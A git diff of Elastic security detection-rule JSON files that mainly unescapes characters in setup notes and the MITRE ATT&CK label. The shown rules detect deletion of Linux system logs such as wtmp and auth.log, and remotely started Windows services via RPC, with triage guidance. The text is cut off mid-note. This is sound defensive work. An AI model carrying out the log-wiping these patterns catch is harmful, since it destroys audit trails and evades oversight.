a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json index a5f8fd540b8..495bc6456f7 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_105.json 
@@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json index 63e189d3b7b..76bf2e78a4f 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_106.json 
@@ -48,7 +48,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json index d88b1950f35..cb63ce8dec8 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_107.json 
@@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "System Log File Deletion", - "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", + "note": "### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).", "query": "file where host.os.type == \"linux\" and event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\",\n \"/var/log/boot.log\",\n \"/var/log/kern.log\"\n ) and\n not process.name : (\"gzip\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json index 8c8cc7def4f..6c5d868b628 100644 --- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_108.json 
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in either from Elastic Defend, or Auditbeat integration.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat for Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete Setup and Run Auditbeat information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json
index c56e7a5fc1d..e2039b7dcf9 100644
--- a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json
+++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_109.json
@@ -47,7 +47,7 @@ ], "risk_score": 47, "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", - "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions \u003c8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json
index 2b33e279993..3d8040f965d 100644
--- a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_104.json
@@ -13,8 +13,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. 
If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port \u003e= 49152 and destination.port \u003e= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and\n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell 